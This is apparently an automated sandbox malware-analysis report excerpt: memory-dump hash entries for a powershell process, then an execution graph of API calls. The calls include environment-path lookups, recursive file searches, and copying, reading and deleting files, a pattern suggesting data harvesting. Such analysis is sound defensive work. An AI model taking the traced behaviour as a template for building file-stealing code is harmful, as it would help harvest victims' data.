                                                              • Opcode ID: eb3cb48ee77fd0f978cee6a494c7f1c82cb5d1f992f3437c5f0453669523c7d3
                                                              • Instruction ID: b74fb5d8c5f0e234d50a9099a2dc33ab4610aec8db5314bb09886b61073a6ef8
                                                              • Opcode Fuzzy Hash: eb3cb48ee77fd0f978cee6a494c7f1c82cb5d1f992f3437c5f0453669523c7d3
                                                              • Instruction Fuzzy Hash: 29F0B431E2530ADFCF01ABA9E8449EE7B78FB45221F804555D004D7295E7241C468BA5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197084723.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_45dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc93d6fd512416391a7ab3d4fc813789a9d082df0b62e6ad2035f564b697b1df
                                                              • Instruction ID: 512b4c77be445f9696cab1fb41e5f517e002608c4185e09989945ba7f3a33e17
                                                              • Opcode Fuzzy Hash: dc93d6fd512416391a7ab3d4fc813789a9d082df0b62e6ad2035f564b697b1df
                                                              • Instruction Fuzzy Hash: 64F0C871004340AEE7208E19DC84B62FFA8EF91334F18C55AED480B286D2796845CBB1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54f500beb074e1a4a4aaa9579e6571acc3f496965a14388c95931f4ef9761430
                                                              • Instruction ID: e12d40b4c7f56f42ff69e14cd2cd78e0409b277ef2dce5fcb978848238f5454b
                                                              • Opcode Fuzzy Hash: 54f500beb074e1a4a4aaa9579e6571acc3f496965a14388c95931f4ef9761430
                                                              • Instruction Fuzzy Hash: BBF0A93062620ADBDF08BBF4C915ABE7B75AB40309F200848E802AFAC4DFB469459B51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b3f1911d0afe0aa66c5f2e75cf84aad6735e71ebf4e589f2f38affc888cf86f
                                                              • Instruction ID: 94bc0f73e2fdd29561d531a5c31b9579a085b6b5ef857cef1cea6e2c6a2f54ce
                                                              • Opcode Fuzzy Hash: 2b3f1911d0afe0aa66c5f2e75cf84aad6735e71ebf4e589f2f38affc888cf86f
                                                              • Instruction Fuzzy Hash: 97F0313052220EDFDB54EFE4D959AAE7B75EB44305F200028E406A7254DF745D45CF50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f97302620ad52e3b47b84ba199f5befcaa5ac5a4d9160678c7d0d5041d5af36
                                                              • Instruction ID: 56e4d7c75858111efa711dc889685bb05aa44d9923aba7b10bd8f6837ba633a8
                                                              • Opcode Fuzzy Hash: 7f97302620ad52e3b47b84ba199f5befcaa5ac5a4d9160678c7d0d5041d5af36
                                                              • Instruction Fuzzy Hash: F0F0143092221EDFDB54ABE4D949AADBBB5AB48305F200028E506AA294CB715912DF51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a88cd5b79590fb2902f8b6766dd9224ab6dbfbbb3a9f07755fa8c4c236a1f041
                                                              • Instruction ID: 646ffed2312f6c78e16c7ac1909f006618b56f54e271e4b1bc627cf19c4f7548
                                                              • Opcode Fuzzy Hash: a88cd5b79590fb2902f8b6766dd9224ab6dbfbbb3a9f07755fa8c4c236a1f041
                                                              • Instruction Fuzzy Hash: 4DF0373092121EDFDB64EFE4D949AAEBFB5EF48305F204028E816AB294CB706911CF51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c203833af096bf119b7452499d556e3115613da2fd4008ce027e7536538886c
                                                              • Instruction ID: c799b150cdc2c8a93693ac8cf0dbcc756e7d20ba85908eb1ab9c8c3a935cefb5
                                                              • Opcode Fuzzy Hash: 7c203833af096bf119b7452499d556e3115613da2fd4008ce027e7536538886c
                                                              • Instruction Fuzzy Hash: 65F0673092230EDFDF54EFE4C849AAEBF75EB48305F200028E806AB294CB706841CB10
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ab16e361468ffeb7114e0091622d9c3431ef68882059db450589b8f9ff7d5d8
                                                              • Instruction ID: 3fb0b3f3c78e52bc7bf174757f997696a987d32afc23deee443f65ec5f33b0da
                                                              • Opcode Fuzzy Hash: 7ab16e361468ffeb7114e0091622d9c3431ef68882059db450589b8f9ff7d5d8
                                                              • Instruction Fuzzy Hash: F0F0493092230EDFDF54EBE4C909AADBBB5AB44305F200018E506AB294CB705911DB10
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bcedf359c7073f8e16311f1266a667dd3bf23f46739c85a9366c3c8c6c61dd59
                                                              • Instruction ID: 3235904a40d30b238d73025e81f217efe5e703bf7c9aba3a931a8ff717611301
                                                              • Opcode Fuzzy Hash: bcedf359c7073f8e16311f1266a667dd3bf23f46739c85a9366c3c8c6c61dd59
                                                              • Instruction Fuzzy Hash: 43F0F870219281AFD322CB14C855996BB71AB86315B19C187D045CF2A7C776E846D751
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f551a6ac4642f9584c5660a3435501a107c260a2f20cee57b134436548ce2f30
                                                              • Instruction ID: edc3e51daa5bf7b3c13b2406615e2b71bd1c50b8c96c995e9ce13789670e9ce6
                                                              • Opcode Fuzzy Hash: f551a6ac4642f9584c5660a3435501a107c260a2f20cee57b134436548ce2f30
                                                              • Instruction Fuzzy Hash: 2DF0A03062221EDFDF14FBD0C905AAE7B74EB04305F204404E902AA294CB746E0ACB55
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 776f0b63f110b56b21e402f7dcbc1afb24677ec63180b62b4762a0f9796674c1
                                                              • Instruction ID: f0d4c28c85415b5ef0dce37f5dad99f1fccd038553da32a315a979278c5b4baa
                                                              • Opcode Fuzzy Hash: 776f0b63f110b56b21e402f7dcbc1afb24677ec63180b62b4762a0f9796674c1
                                                              • Instruction Fuzzy Hash: 5CF0A03062220EDFDF14FFD0C905AAE7B74EB04309F204448F802AB284CB746E06CB45
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90d45b1a3e6bbc6be8e0879ee5bd575fde1f13cd2e3fbe33b6066c92c1363c32
                                                              • Instruction ID: 79ba7f4fd332000d3f3252af2a9f82ac4f9d91382a8da591a70230719e7b034c
                                                              • Opcode Fuzzy Hash: 90d45b1a3e6bbc6be8e0879ee5bd575fde1f13cd2e3fbe33b6066c92c1363c32
                                                              • Instruction Fuzzy Hash: C3E09A7062220FDBDF14BFE0C905AAEBB74EB1030AF200858E802AB684CBB069159F51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21b6f695dd7032b5660f6c2721397298f83b7a10edb81c81785a820739282248
                                                              • Instruction ID: 598317585bab16d6d2a096e90352c0f17bf6c4dabc32aa5fa2dd273b9354c028
                                                              • Opcode Fuzzy Hash: 21b6f695dd7032b5660f6c2721397298f83b7a10edb81c81785a820739282248
                                                              • Instruction Fuzzy Hash: 96E09A7062220FDBDF14BFE0C905AAE7B34EB00309F200848E802AB684CBB069159B11
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21b6f695dd7032b5660f6c2721397298f83b7a10edb81c81785a820739282248
                                                              • Instruction ID: 598317585bab16d6d2a096e90352c0f17bf6c4dabc32aa5fa2dd273b9354c028
                                                              • Opcode Fuzzy Hash: 21b6f695dd7032b5660f6c2721397298f83b7a10edb81c81785a820739282248
                                                              • Instruction Fuzzy Hash: 96E09A7062220FDBDF14BFE0C905AAE7B34EB00309F200848E802AB684CBB069159B11
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: deec8ed52b6dcd0ac622c3fd5bbbb0b19d347b1520f2039c86f88b7e03a91a9d
                                                              • Instruction ID: 3c819aaa3a82d25de78b99af8c6597ce2bff3e93b7b7805854d300095e4a9a26
                                                              • Opcode Fuzzy Hash: deec8ed52b6dcd0ac622c3fd5bbbb0b19d347b1520f2039c86f88b7e03a91a9d
                                                              • Instruction Fuzzy Hash: 15D05E3052220FDBDF14FA80C6107BE76606B1020DF200449C801B5580D7B066058A56
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197084723.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_45dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b81de558d1abea40ff72a6fbf003bfdaaf6e16386463d33256dc8fe3065e2075
                                                              • Instruction ID: aca24b0448703c6fb21b45dd3c82a93f27e7280495752eb552e0297443cbc945
                                                              • Opcode Fuzzy Hash: b81de558d1abea40ff72a6fbf003bfdaaf6e16386463d33256dc8fe3065e2075
                                                              • Instruction Fuzzy Hash: AA21D676604200DFDB25DF18D9C4B26BF75FF94320F24C5A9D9090B246C336E45AEBA1
                                                              Strings
                                                              Memory Dump Source

Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 2%
Total number of Nodes: 1645
Total number of Limit Nodes: 1
23d768a9 6448->6449 6450 23d7571e _free 20 API calls 6448->6450 6451 23d768bd 6449->6451 6450->6449 6468 23d756b9 RtlLeaveCriticalSection 6451->6468 6453 23d768c7 6453->6440 6455 23d77022 6454->6455 6459 23d7701e 6454->6459 6456 23d77029 6455->6456 6461 23d7703c ___scrt_fastfail 6455->6461 6457 23d76368 _free 20 API calls 6456->6457 6458 23d7702e 6457->6458 6460 23d762ac ___std_exception_copy 26 API calls 6458->6460 6459->6444 6460->6459 6461->6459 6462 23d77073 6461->6462 6463 23d7706a 6461->6463 6462->6459 6466 23d76368 _free 20 API calls 6462->6466 6464 23d76368 _free 20 API calls 6463->6464 6465 23d7706f 6464->6465 6467 23d762ac ___std_exception_copy 26 API calls 6465->6467 6466->6465 6467->6459 6468->6453 6471 23d7545a 6469->6471 6473 23d75468 6469->6473 6470 23d76368 _free 20 API calls 6472 23d75470 6470->6472 6471->6473 6476 23d7547f 6471->6476 6474 23d762ac ___std_exception_copy 26 API calls 6472->6474 6473->6470 6475 23d7547a 6474->6475 6475->5955 6476->6475 6477 23d76368 _free 20 API calls 6476->6477 6477->6472 6479 23d7500d 6478->6479 6483 23d74fd7 6478->6483 6480 23d75024 6479->6480 6481 23d7571e _free 20 API calls 6479->6481 6482 23d7571e _free 20 API calls 6480->6482 6481->6479 6482->6483 6483->5953 6484 23d773d5 6485 23d773e1 ___scrt_is_nonwritable_in_current_image 6484->6485 6496 23d75671 RtlEnterCriticalSection 6485->6496 6487 23d773e8 6497 23d78be3 6487->6497 6489 23d773f7 6490 23d77406 6489->6490 6510 23d77269 GetStartupInfoW 6489->6510 6521 23d77422 6490->6521 6494 23d77417 _abort 6496->6487 6498 23d78bef ___scrt_is_nonwritable_in_current_image 6497->6498 6499 23d78c13 6498->6499 6500 23d78bfc 6498->6500 6524 23d75671 RtlEnterCriticalSection 6499->6524 6502 23d76368 _free 20 API calls 6500->6502 6503 23d78c01 6502->6503 6505 23d762ac ___std_exception_copy 26 API calls 6503->6505 6504 23d78c1f 6509 23d78c4b 6504->6509 6525 23d78b34 6504->6525 6506 23d78c0b _abort 6505->6506 6506->6489 6532 23d78c72 6509->6532 6511 23d77286 6510->6511 6512 
23d77318 6510->6512 6511->6512 6513 23d78be3 27 API calls 6511->6513 6516 23d7731f 6512->6516 6514 23d772af 6513->6514 6514->6512 6515 23d772dd GetFileType 6514->6515 6515->6514 6517 23d77326 6516->6517 6518 23d77369 GetStdHandle 6517->6518 6519 23d773d1 6517->6519 6520 23d7737c GetFileType 6517->6520 6518->6517 6519->6490 6520->6517 6543 23d756b9 RtlLeaveCriticalSection 6521->6543 6523 23d77429 6523->6494 6524->6504 6526 23d7637b __dosmaperr 20 API calls 6525->6526 6527 23d78b46 6526->6527 6531 23d78b53 6527->6531 6535 23d75eb7 6527->6535 6528 23d7571e _free 20 API calls 6529 23d78ba5 6528->6529 6529->6504 6531->6528 6542 23d756b9 RtlLeaveCriticalSection 6532->6542 6534 23d78c79 6534->6506 6536 23d75c45 __dosmaperr 5 API calls 6535->6536 6537 23d75ede 6536->6537 6538 23d75ee7 6537->6538 6539 23d75efc InitializeCriticalSectionAndSpinCount 6537->6539 6540 23d72ada _ValidateLocalCookies 5 API calls 6538->6540 6539->6538 6541 23d75f13 6540->6541 6541->6527 6542->6534 6543->6523 6544 23d766d5 6545 23d766e1 6544->6545 6546 23d766f2 6545->6546 6547 23d766eb FindClose 6545->6547 6548 23d72ada _ValidateLocalCookies 5 API calls 6546->6548 6547->6546 6549 23d76701 6548->6549 6947 23d75351 6948 23d75360 6947->6948 6949 23d75374 6947->6949 6948->6949 6951 23d7571e _free 20 API calls 6948->6951 6950 23d7571e _free 20 API calls 6949->6950 6952 23d75386 6950->6952 6951->6949 6953 23d7571e _free 20 API calls 6952->6953 6954 23d75399 6953->6954 6955 23d7571e _free 20 API calls 6954->6955 6956 23d753aa 6955->6956 6957 23d7571e _free 20 API calls 6956->6957 6958 23d753bb 6957->6958 6550 23d736d0 6551 23d736e2 6550->6551 6553 23d736f0 @_EH4_CallFilterFunc@8 6550->6553 6552 23d72ada _ValidateLocalCookies 5 API calls 6551->6552 6552->6553 6554 23d74bdd 6555 23d74bec 6554->6555 6556 23d74c08 6554->6556 6555->6556 6557 23d74bf2 6555->6557 6558 23d76d60 51 API calls 6556->6558 6559 23d76368 _free 20 API calls 6557->6559 6560 23d74c0f GetModuleFileNameA 6558->6560 6561 23d74bf7 6559->6561 
6562 23d74c33 6560->6562 6563 23d762ac ___std_exception_copy 26 API calls 6561->6563 6577 23d74d01 6562->6577 6574 23d74c01 6563->6574 6568 23d74c66 6570 23d76368 _free 20 API calls 6568->6570 6569 23d74c72 6571 23d74d01 38 API calls 6569->6571 6576 23d74c6b 6570->6576 6573 23d74c88 6571->6573 6572 23d7571e _free 20 API calls 6572->6574 6575 23d7571e _free 20 API calls 6573->6575 6573->6576 6575->6576 6576->6572 6580 23d74d26 6577->6580 6579 23d74d86 6581 23d74c50 6579->6581 6582 23d770eb 38 API calls 6579->6582 6580->6579 6589 23d770eb 6580->6589 6583 23d74e76 6581->6583 6582->6579 6584 23d74c5d 6583->6584 6585 23d74e8b 6583->6585 6584->6568 6584->6569 6585->6584 6586 23d7637b __dosmaperr 20 API calls 6585->6586 6587 23d74eb9 6586->6587 6588 23d7571e _free 20 API calls 6587->6588 6588->6584 6592 23d77092 6589->6592 6593 23d754a7 __fassign 38 API calls 6592->6593 6594 23d770a6 6593->6594 6594->6580 5689 23d71c5b 5690 23d71c6b ___scrt_fastfail 5689->5690 5693 23d712ee 5690->5693 5692 23d71c87 5694 23d71324 ___scrt_fastfail 5693->5694 5695 23d713b7 GetEnvironmentVariableW 5694->5695 5719 23d710f1 5695->5719 5698 23d710f1 57 API calls 5699 23d71465 5698->5699 5700 23d710f1 57 API calls 5699->5700 5701 23d71479 5700->5701 5702 23d710f1 57 API calls 5701->5702 5703 23d7148d 5702->5703 5704 23d710f1 57 API calls 5703->5704 5705 23d714a1 5704->5705 5706 23d710f1 57 API calls 5705->5706 5707 23d714b5 lstrlenW 5706->5707 5708 23d714d9 lstrlenW 5707->5708 5718 23d714d2 5707->5718 5709 23d710f1 57 API calls 5708->5709 5710 23d71501 lstrlenW lstrcatW 5709->5710 5711 23d710f1 57 API calls 5710->5711 5712 23d71539 lstrlenW lstrcatW 5711->5712 5713 23d710f1 57 API calls 5712->5713 5714 23d7156b lstrlenW lstrcatW 5713->5714 5715 23d710f1 57 API calls 5714->5715 5716 23d7159d lstrlenW lstrcatW 5715->5716 5717 23d710f1 57 API calls 5716->5717 5717->5718 5718->5692 5720 23d71118 ___scrt_fastfail 5719->5720 5721 23d71129 lstrlenW 5720->5721 5732 23d72c40 5721->5732 5724 23d71177 
lstrlenW FindFirstFileW 5726 23d711e1 5724->5726 5727 23d711a0 5724->5727 5725 23d71168 lstrlenW 5725->5724 5726->5698 5728 23d711c7 FindNextFileW 5727->5728 5729 23d711aa 5727->5729 5728->5727 5731 23d711da FindClose 5728->5731 5729->5728 5734 23d71000 5729->5734 5731->5726 5733 23d71148 lstrcatW lstrlenW 5732->5733 5733->5724 5733->5725 5735 23d71022 ___scrt_fastfail 5734->5735 5736 23d710af 5735->5736 5737 23d7102f lstrcatW lstrlenW 5735->5737 5740 23d710b5 lstrlenW 5736->5740 5750 23d710ad 5736->5750 5738 23d7106b lstrlenW 5737->5738 5739 23d7105a lstrlenW 5737->5739 5751 23d71e89 lstrlenW 5738->5751 5739->5738 5765 23d71e16 5740->5765 5743 23d71088 GetFileAttributesW 5745 23d7109c 5743->5745 5743->5750 5744 23d710ca 5746 23d71e89 5 API calls 5744->5746 5744->5750 5745->5750 5757 23d7173a 5745->5757 5747 23d710df 5746->5747 5770 23d711ea 5747->5770 5750->5729 5752 23d72c40 ___scrt_fastfail 5751->5752 5753 23d71ea7 lstrcatW lstrlenW 5752->5753 5754 23d71ec2 5753->5754 5755 23d71ed1 lstrcatW 5753->5755 5754->5755 5756 23d71ec7 lstrlenW 5754->5756 5755->5743 5756->5755 5758 23d71747 ___scrt_fastfail 5757->5758 5785 23d71cca 5758->5785 5762 23d7199f 5762->5750 5763 23d71824 ___scrt_fastfail _strlen 5763->5762 5805 23d715da 5763->5805 5766 23d71e29 5765->5766 5769 23d71e4c 5765->5769 5767 23d71e2d lstrlenW 5766->5767 5766->5769 5768 23d71e3f lstrlenW 5767->5768 5767->5769 5768->5769 5769->5744 5771 23d7120e ___scrt_fastfail 5770->5771 5772 23d71e89 5 API calls 5771->5772 5773 23d71220 GetFileAttributesW 5772->5773 5774 23d71246 5773->5774 5775 23d71235 5773->5775 5776 23d71e89 5 API calls 5774->5776 5775->5774 5778 23d7173a 35 API calls 5775->5778 5777 23d71258 5776->5777 5779 23d710f1 56 API calls 5777->5779 5778->5774 5780 23d7126d 5779->5780 5781 23d71e89 5 API calls 5780->5781 5782 23d7127f ___scrt_fastfail 5781->5782 5783 23d710f1 56 API calls 5782->5783 5784 23d712e6 5783->5784 5784->5750 5786 23d71cf1 ___scrt_fastfail 5785->5786 5787 23d71d0f CopyFileW 
CreateFileW 5786->5787 5788 23d71d55 GetFileSize 5787->5788 5789 23d71d44 DeleteFileW 5787->5789 5790 23d71ede 22 API calls 5788->5790 5794 23d71808 5789->5794 5791 23d71d66 ReadFile 5790->5791 5792 23d71d94 CloseHandle DeleteFileW 5791->5792 5793 23d71d7d CloseHandle DeleteFileW 5791->5793 5792->5794 5793->5794 5794->5762 5795 23d71ede 5794->5795 5797 23d7222f 5795->5797 5798 23d7224e 5797->5798 5801 23d72250 5797->5801 5813 23d7474f 5797->5813 5818 23d747e5 5797->5818 5798->5763 5800 23d72908 5802 23d735d2 __CxxThrowException@8 RaiseException 5800->5802 5801->5800 5825 23d735d2 5801->5825 5804 23d72925 5802->5804 5804->5763 5806 23d7160c _strcat _strlen 5805->5806 5807 23d7163c lstrlenW 5806->5807 5913 23d71c9d 5807->5913 5809 23d71655 lstrcatW lstrlenW 5810 23d71678 5809->5810 5811 23d71693 ___scrt_fastfail 5810->5811 5812 23d7167e lstrcatW 5810->5812 5811->5763 5812->5811 5828 23d74793 5813->5828 5816 23d7478f 5816->5797 5817 23d74765 5834 23d72ada 5817->5834 5823 23d756d0 __dosmaperr 5818->5823 5819 23d7570e 5847 23d76368 5819->5847 5821 23d756f9 RtlAllocateHeap 5822 23d7570c 5821->5822 5821->5823 5822->5797 5823->5819 5823->5821 5824 23d7474f __dosmaperr 7 API calls 5823->5824 5824->5823 5826 23d735f2 RaiseException 5825->5826 5826->5800 5829 23d7479f ___scrt_is_nonwritable_in_current_image 5828->5829 5841 23d75671 RtlEnterCriticalSection 5829->5841 5831 23d747aa 5842 23d747dc 5831->5842 5833 23d747d1 _abort 5833->5817 5835 23d72ae5 IsProcessorFeaturePresent 5834->5835 5836 23d72ae3 5834->5836 5838 23d72b58 5835->5838 5836->5816 5846 23d72b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5838->5846 5840 23d72c3b 5840->5816 5841->5831 5845 23d756b9 RtlLeaveCriticalSection 5842->5845 5844 23d747e3 5844->5833 5845->5844 5846->5840 5850 23d75b7a GetLastError 5847->5850 5851 23d75b93 5850->5851 5852 23d75b99 5850->5852 5869 23d75e08 5851->5869 5856 23d75bf0 SetLastError 5852->5856 5876 23d7637b 5852->5876 5858 23d75bf9 
5856->5858 5857 23d75bb3 5883 23d7571e 5857->5883 5858->5822 5862 23d75bb9 5864 23d75be7 SetLastError 5862->5864 5863 23d75bcf 5896 23d7593c 5863->5896 5864->5858 5867 23d7571e _free 17 API calls 5868 23d75be0 5867->5868 5868->5856 5868->5864 5901 23d75c45 5869->5901 5871 23d75e2f 5872 23d75e47 TlsGetValue 5871->5872 5873 23d75e3b 5871->5873 5872->5873 5874 23d72ada _ValidateLocalCookies 5 API calls 5873->5874 5875 23d75e58 5874->5875 5875->5852 5877 23d76388 __dosmaperr 5876->5877 5878 23d763b3 RtlAllocateHeap 5877->5878 5879 23d763c8 5877->5879 5882 23d7474f __dosmaperr 7 API calls 5877->5882 5878->5877 5880 23d75bab 5878->5880 5881 23d76368 _free 19 API calls 5879->5881 5880->5857 5889 23d75e5e 5880->5889 5881->5880 5882->5877 5884 23d75752 _free 5883->5884 5885 23d75729 HeapFree 5883->5885 5884->5862 5885->5884 5886 23d7573e 5885->5886 5887 23d76368 _free 18 API calls 5886->5887 5888 23d75744 GetLastError 5887->5888 5888->5884 5890 23d75c45 __dosmaperr 5 API calls 5889->5890 5891 23d75e85 5890->5891 5892 23d75ea0 TlsSetValue 5891->5892 5894 23d75e94 5891->5894 5892->5894 5893 23d72ada _ValidateLocalCookies 5 API calls 5895 23d75bc8 5893->5895 5894->5893 5895->5857 5895->5863 5907 23d75914 5896->5907 5903 23d75c71 5901->5903 5906 23d75c75 __crt_fast_encode_pointer 5901->5906 5902 23d75ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5902->5903 5903->5902 5905 23d75c95 5903->5905 5903->5906 5904 23d75ca1 GetProcAddress 5904->5906 5905->5904 5905->5906 5906->5871 5908 23d75854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 5907->5908 5909 23d75938 5908->5909 5910 23d758c4 5909->5910 5911 23d75758 __dosmaperr 20 API calls 5910->5911 5912 23d758e8 5911->5912 5912->5867 5914 23d71ca6 _strlen 5913->5914 5914->5809 6595 23d720db 6596 23d720e7 ___scrt_is_nonwritable_in_current_image 6595->6596 6597 23d72110 dllmain_raw 6596->6597 6599 23d720f6 6596->6599 6602 23d7210b 6596->6602 6598 23d7212a 6597->6598 6597->6599 6608 23d71eec 
6598->6608 6601 23d72177 6601->6599 6603 23d71eec 31 API calls 6601->6603 6602->6599 6602->6601 6606 23d71eec 31 API calls 6602->6606 6604 23d7218a 6603->6604 6604->6599 6605 23d72193 dllmain_raw 6604->6605 6605->6599 6607 23d7216d dllmain_raw 6606->6607 6607->6601 6609 23d71ef7 6608->6609 6610 23d71f2a dllmain_crt_process_detach 6608->6610 6611 23d71f1c dllmain_crt_process_attach 6609->6611 6612 23d71efc 6609->6612 6617 23d71f06 6610->6617 6611->6617 6613 23d71f12 6612->6613 6614 23d71f01 6612->6614 6623 23d723ec 6613->6623 6614->6617 6618 23d7240b 6614->6618 6617->6602 6631 23d753e5 6618->6631 6742 23d73513 6623->6742 6628 23d72408 6628->6617 6629 23d7351e 7 API calls 6630 23d723f5 6629->6630 6630->6617 6637 23d75aca 6631->6637 6634 23d7351e 6713 23d73820 6634->6713 6636 23d72415 6636->6617 6638 23d75ad4 6637->6638 6641 23d72410 6637->6641 6639 23d75e08 __dosmaperr 11 API calls 6638->6639 6640 23d75adb 6639->6640 6640->6641 6642 23d75e5e __dosmaperr 11 API calls 6640->6642 6641->6634 6643 23d75aee 6642->6643 6645 23d759b5 6643->6645 6646 23d759c0 6645->6646 6650 23d759d0 6645->6650 6651 23d759d6 6646->6651 6649 23d7571e _free 20 API calls 6649->6650 6650->6641 6652 23d759ef 6651->6652 6653 23d759e9 6651->6653 6654 23d7571e _free 20 API calls 6652->6654 6655 23d7571e _free 20 API calls 6653->6655 6656 23d759fb 6654->6656 6655->6652 6657 23d7571e _free 20 API calls 6656->6657 6658 23d75a06 6657->6658 6659 23d7571e _free 20 API calls 6658->6659 6660 23d75a11 6659->6660 6661 23d7571e _free 20 API calls 6660->6661 6662 23d75a1c 6661->6662 6663 23d7571e _free 20 API calls 6662->6663 6664 23d75a27 6663->6664 6665 23d7571e _free 20 API calls 6664->6665 6666 23d75a32 6665->6666 6667 23d7571e _free 20 API calls 6666->6667 6668 23d75a3d 6667->6668 6669 23d7571e _free 20 API calls 6668->6669 6670 23d75a48 6669->6670 6671 23d7571e _free 20 API calls 6670->6671 6672 23d75a56 6671->6672 6677 23d7589c 6672->6677 6683 23d757a8 6677->6683 6679 23d758c0 6680 23d758ec 6679->6680 
